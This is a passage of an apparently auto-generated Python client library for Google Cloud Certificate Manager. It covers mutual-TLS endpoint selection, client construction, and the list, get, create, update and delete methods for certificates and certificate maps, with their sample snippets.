def get_mtls_endpoint_and_cert_source(
cls, client_options: Optional[client_options_lib.ClientOptions] = None
):
"""Return the API endpoint and client cert source for mutual TLS.
The client cert source is determined in the following order:
(1) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is not "true", the
client cert source is None.
(2) if `client_options.client_cert_source` is provided, use the provided one; if the
default client cert source exists, use the default one; otherwise the client cert
source is None.
The API endpoint is determined in the following order:
(1) if `client_options.api_endpoint` is provided, use the provided one.
(2) if the `GOOGLE_API_USE_MTLS_ENDPOINT` environment variable is "always", use the
default mTLS endpoint; if the environment variable is "never", use the default API
endpoint; otherwise if client cert source exists, use the default mTLS endpoint, otherwise
use the default API endpoint.
More details can be found at https://google.aip.dev/auth/4114.
Args:
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. Only the `api_endpoint` and `client_cert_source` properties may be used
in this method.
Returns:
Tuple[str, Callable[[], Tuple[bytes, bytes]]]: returns the API endpoint and the
client cert source to use.
Raises:
google.auth.exceptions.MutualTLSChannelError: If any errors happen.
"""
if client_options is None:
client_options = client_options_lib.ClientOptions()
use_client_cert = os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false")
use_mtls_endpoint = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_client_cert not in ("true", "false"):
raise ValueError(
"Environment variable `GOOGLE_API_USE_CLIENT_CERTIFICATE` must be either `true` or `false`"
)
if use_mtls_endpoint not in ("auto", "never", "always"):
raise MutualTLSChannelError(
"Environment variable `GOOGLE_API_USE_MTLS_ENDPOINT` must be `never`, `auto` or `always`"
)
# Figure out the client cert source to use.
client_cert_source = None
if use_client_cert == "true":
if client_options.client_cert_source:
client_cert_source = client_options.client_cert_source
elif mtls.has_default_client_cert_source():
client_cert_source = mtls.default_client_cert_source()
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
elif use_mtls_endpoint == "always" or (
use_mtls_endpoint == "auto" and client_cert_source
):
api_endpoint = cls.DEFAULT_MTLS_ENDPOINT
else:
api_endpoint = cls.DEFAULT_ENDPOINT
return api_endpoint, client_cert_source
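# Added sketch of one row of the decision table above (environment values are
# hypothetical):
#
#   os.environ["GOOGLE_API_USE_CLIENT_CERTIFICATE"] = "false"
#   os.environ["GOOGLE_API_USE_MTLS_ENDPOINT"] = "auto"
#   endpoint, cert_src = CertificateManagerClient.get_mtls_endpoint_and_cert_source()
#   # -> ("certificatemanager.googleapis.com", None): with no client
#   #    certificate available, "auto" falls back to the regular endpoint.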
def __init__(
self,
*,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, CertificateManagerTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the certificate manager client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, CertificateManagerTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
api_endpoint, client_cert_source_func = self.get_mtls_endpoint_and_cert_source(
client_options
)
api_key_value = getattr(client_options, "api_key", None)
if api_key_value and credentials:
raise ValueError(
"client_options.api_key and credentials are mutually exclusive"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, CertificateManagerTransport):
# transport is a CertificateManagerTransport instance.
if credentials or client_options.credentials_file or api_key_value:
raise ValueError(
"When providing a transport instance, "
"provide its credentials directly."
)
if client_options.scopes:
raise ValueError(
"When providing a transport instance, provide its scopes "
"directly."
)
self._transport = transport
else:
import google.auth._default # type: ignore
if api_key_value and hasattr(
google.auth._default, "get_api_key_credentials"
):
credentials = google.auth._default.get_api_key_credentials(
api_key_value
)
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials,
credentials_file=client_options.credentials_file,
host=api_endpoint,
scopes=client_options.scopes,
client_cert_source_for_mtls=client_cert_source_func,
quota_project_id=client_options.quota_project_id,
client_info=client_info,
always_use_jwt_access=True,
)
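# Hedged construction sketch (added; the explicit options are hypothetical,
# and a bare CertificateManagerClient() resolves everything above
# automatically):
#
#   client = CertificateManagerClient()  # default gRPC transport
#   opts = client_options_lib.ClientOptions(
#       api_endpoint="certificatemanager.googleapis.com"
#   )
#   client = CertificateManagerClient(client_options=opts)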
def list_certificates(
self,
request: Union[certificate_manager.ListCertificatesRequest, dict] = None,
*,
parent: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListCertificatesPager:
r"""Lists Certificates in a given project and location.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_list_certificates():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.ListCertificatesRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_certificates(request=request)
# Handle the response
for response in page_result:
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.ListCertificatesRequest, dict]):
The request object. Request for the `ListCertificates`
method.
parent (str):
Required. The project and location from which the
certificate should be listed, specified in the format
``projects/*/locations/*``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.certificate_manager_v1.services.certificate_manager.pagers.ListCertificatesPager:
Response for the ListCertificates method.
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.ListCertificatesRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.ListCertificatesRequest):
request = certificate_manager.ListCertificatesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.list_certificates]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListCertificatesPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
def get_certificate(
self,
request: Union[certificate_manager.GetCertificateRequest, dict] = None,
*,
name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> certificate_manager.Certificate:
r"""Gets details of a single Certificate.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_get_certificate():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.GetCertificateRequest(
name="name_value",
)
# Make the request
response = client.get_certificate(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.GetCertificateRequest, dict]):
The request object. Request for the `GetCertificate`
method.
name (str):
Required. A name of the certificate to describe. Must be
in the format ``projects/*/locations/*/certificates/*``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.certificate_manager_v1.types.Certificate:
Defines TLS certificate.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.GetCertificateRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.GetCertificateRequest):
request = certificate_manager.GetCertificateRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_certificate]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def create_certificate(
self,
request: Union[certificate_manager.CreateCertificateRequest, dict] = None,
*,
parent: str = None,
certificate: certificate_manager.Certificate = None,
certificate_id: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Creates a new Certificate in a given project and
location.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_create_certificate():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.CreateCertificateRequest(
parent="parent_value",
certificate_id="certificate_id_value",
)
# Make the request
operation = client.create_certificate(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.CreateCertificateRequest, dict]):
The request object. Request for the `CreateCertificate`
method.
parent (str):
Required. The parent resource of the certificate. Must
be in the format ``projects/*/locations/*``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
certificate (google.cloud.certificate_manager_v1.types.Certificate):
Required. A definition of the
certificate to create.
This corresponds to the ``certificate`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
certificate_id (str):
Required. A user-provided name of the
certificate.
This corresponds to the ``certificate_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.certificate_manager_v1.types.Certificate`
Defines TLS certificate.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, certificate, certificate_id])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.CreateCertificateRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.CreateCertificateRequest):
request = certificate_manager.CreateCertificateRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if certificate is not None:
request.certificate = certificate
if certificate_id is not None:
request.certificate_id = certificate_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.create_certificate]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
certificate_manager.Certificate,
metadata_type=certificate_manager.OperationMetadata,
)
# Done; return the response.
return response
def update_certificate(
self,
request: Union[certificate_manager.UpdateCertificateRequest, dict] = None,
*,
certificate: certificate_manager.Certificate = None,
update_mask: field_mask_pb2.FieldMask = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Updates a Certificate.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_update_certificate():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.UpdateCertificateRequest(
)
# Make the request
operation = client.update_certificate(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.UpdateCertificateRequest, dict]):
The request object. Request for the `UpdateCertificate`
method.
certificate (google.cloud.certificate_manager_v1.types.Certificate):
Required. A definition of the
certificate to update.
This corresponds to the ``certificate`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
Required. The update mask applies to the resource. For
the ``FieldMask`` definition, see
https://developers.google.com/protocol-buffers/docs/reference/google.protobuf#fieldmask.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.certificate_manager_v1.types.Certificate`
Defines TLS certificate.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([certificate, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.UpdateCertificateRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.UpdateCertificateRequest):
request = certificate_manager.UpdateCertificateRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if certificate is not None:
request.certificate = certificate
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.update_certificate]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("certificate.name", request.certificate.name),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
certificate_manager.Certificate,
metadata_type=certificate_manager.OperationMetadata,
)
# Done; return the response.
return response
def delete_certificate(
self,
request: Union[certificate_manager.DeleteCertificateRequest, dict] = None,
*,
name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Deletes a single Certificate.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_delete_certificate():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.DeleteCertificateRequest(
name="name_value",
)
# Make the request
operation = client.delete_certificate(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.DeleteCertificateRequest, dict]):
The request object. Request for the `DeleteCertificate`
method.
name (str):
Required. A name of the certificate to delete. Must be
in the format ``projects/*/locations/*/certificates/*``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to
use it as the request or the response type of an API
method. For instance:
service Foo {
rpc Bar(google.protobuf.Empty) returns
(google.protobuf.Empty);
}
The JSON representation for Empty is empty JSON
object {}.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.DeleteCertificateRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.DeleteCertificateRequest):
request = certificate_manager.DeleteCertificateRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.delete_certificate]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
empty_pb2.Empty,
metadata_type=certificate_manager.OperationMetadata,
)
# Done; return the response.
return response
def list_certificate_maps(
self,
request: Union[certificate_manager.ListCertificateMapsRequest, dict] = None,
*,
parent: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListCertificateMapsPager:
r"""Lists CertificateMaps in a given project and
location.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_list_certificate_maps():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.ListCertificateMapsRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_certificate_maps(request=request)
# Handle the response
for response in page_result:
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.ListCertificateMapsRequest, dict]):
The request object. Request for the
`ListCertificateMaps` method.
parent (str):
Required. The project and location from which the
certificate maps should be listed, specified in the
format ``projects/*/locations/*``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.certificate_manager_v1.services.certificate_manager.pagers.ListCertificateMapsPager:
Response for the ListCertificateMaps method.
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.ListCertificateMapsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.ListCertificateMapsRequest):
request = certificate_manager.ListCertificateMapsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.list_certificate_maps]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListCertificateMapsPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
def get_certificate_map(
self,
request: Union[certificate_manager.GetCertificateMapRequest, dict] = None,
*,
name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> certificate_manager.CertificateMap:
r"""Gets details of a single CertificateMap.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_get_certificate_map():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.GetCertificateMapRequest(
name="name_value",
)
# Make the request
response = client.get_certificate_map(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.GetCertificateMapRequest, dict]):
The request object. Request for the `GetCertificateMap`
method.
name (str):
Required. A name of the certificate map to describe.
Must be in the format
``projects/*/locations/*/certificateMaps/*``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.certificate_manager_v1.types.CertificateMap:
Defines a collection of certificate
configurations.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.GetCertificateMapRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.GetCertificateMapRequest):
request = certificate_manager.GetCertificateMapRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_certificate_map]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def create_certificate_map(
self,
request: Union[certificate_manager.CreateCertificateMapRequest, dict] = None,
*,
parent: str = None,
certificate_map: certificate_manager.CertificateMap = None,
certificate_map_id: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Creates a new CertificateMap in a given project and
location.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_create_certificate_map():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.CreateCertificateMapRequest(
parent="parent_value",
certificate_map_id="certificate_map_id_value",
)
# Make the request
operation = client.create_certificate_map(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.CreateCertificateMapRequest, dict]):
The request object. Request for the
`CreateCertificateMap` method.
parent (str):
Required. The parent resource of the certificate map.
Must be in the format ``projects/*/locations/*``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
certificate_map (google.cloud.certificate_manager_v1.types.CertificateMap):
Required. A definition of the
certificate map to create.
This corresponds to the ``certificate_map`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
certificate_map_id (str):
Required. A user-provided name of the
certificate map.
This corresponds to the ``certificate_map_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.certificate_manager_v1.types.CertificateMap`
Defines a collection of certificate configurations.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, certificate_map, certificate_map_id])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.CreateCertificateMapRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.CreateCertificateMapRequest):
request = certificate_manager.CreateCertificateMapRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if certificate_map is not None:
request.certificate_map = certificate_map
if certificate_map_id is not None:
request.certificate_map_id = certificate_map_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.create_certificate_map]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
certificate_manager.CertificateMap,
metadata_type=certificate_manager.OperationMetadata,
)
# Done; return the response.
return response
def update_certificate_map(
self,
request: Union[certificate_manager.UpdateCertificateMapRequest, dict] = None,
*,
certificate_map: certificate_manager.CertificateMap = None,
update_mask: field_mask_pb2.FieldMask = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Updates a CertificateMap.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_update_certificate_map():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.UpdateCertificateMapRequest(
)
# Make the request
operation = client.update_certificate_map(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.UpdateCertificateMapRequest, dict]):
The request object. Request for the
`UpdateCertificateMap` method.
certificate_map (google.cloud.certificate_manager_v1.types.CertificateMap):
Required. A definition of the
certificate map to update.
This corresponds to the ``certificate_map`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
Required. The update mask applies to the resource. For
the ``FieldMask`` definition, see
https://developers.google.com/protocol-buffers/docs/reference/google.protobuf#fieldmask.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.certificate_manager_v1.types.CertificateMap`
Defines a collection of certificate configurations.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([certificate_map, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.UpdateCertificateMapRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.UpdateCertificateMapRequest):
request = certificate_manager.UpdateCertificateMapRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if certificate_map is not None:
request.certificate_map = certificate_map
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.update_certificate_map]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("certificate_map.name", request.certificate_map.name),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
certificate_manager.CertificateMap,
metadata_type=certificate_manager.OperationMetadata,
)
# Done; return the response.
return response
def delete_certificate_map(
self,
request: Union[certificate_manager.DeleteCertificateMapRequest, dict] = None,
*,
name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Deletes a single CertificateMap. A Certificate Map
can't be deleted if it contains Certificate Map Entries.
Remove all the entries from the map before calling this
method.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_delete_certificate_map():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.DeleteCertificateMapRequest(
name="name_value",
)
# Make the request
operation = client.delete_certificate_map(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.DeleteCertificateMapRequest, dict]):
The request object. Request for the
`DeleteCertificateMap` method.
name (str):
Required. A name of the certificate map to delete. Must
be in the format
``projects/*/locations/*/certificateMaps/*``.
This corresponds to the ``name`` field
